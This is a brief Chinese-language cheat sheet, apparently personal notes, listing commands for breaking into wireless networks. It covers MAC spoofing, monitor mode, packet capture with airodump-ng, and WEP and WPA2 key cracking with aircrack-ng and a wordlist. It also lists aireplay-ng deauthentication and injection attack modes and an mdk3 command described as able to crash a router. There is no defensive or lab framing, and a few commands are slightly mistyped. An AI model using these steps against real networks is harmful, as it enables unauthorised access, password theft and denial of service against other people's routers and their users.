启动/关闭无线网卡
ifconfig wlan0 up / ifconfig wlan0 down
更改Mac地址:
macchanger -A wlan0
启动监听
airmon-ng start wlan0
获取
airodump-ng mon0 / airodump-ng mon0 -c 信道 抓取指定信道 解决信道固定问题
抓包
airodump-ng — — ivs -w 文件名 -c 信道 mon0
- -ivs 不加抓取cap包 方便日后分析数据
-w 写入并保存 默认保存在kali主文件夹
-c 信道对应需抓包的基站
破解
aircrack-ng ivs文件名
15000+包量使用较好
wpa2
airdump -w 名 -c 信道 - -bssid 无线APMac地址 mon0 // 若信道固定 则抓取时指定信道
更改无线网卡模式为监听模
1、iwconfig查看 wlan0中Mode:Managed—管理模式
2、ifconfig wlan0 down
3、iwconfig wlan0 mode monitor
4、ifconfig wlan0 up
攻击:
aireplay- (0~6) 其它参数
0 冲突模式 -0 后跟冲突次数 -a APmac地址 -c 伪装地址 mon
1 伪装客户端
2 交互模式
3 注入攻击
4 攻击模式
5 碎片包攻击
mdk3 mon a -a 路由Mac地址 //可致路由死机
字典:
aircrack-ng /w 字典文件 cap文件名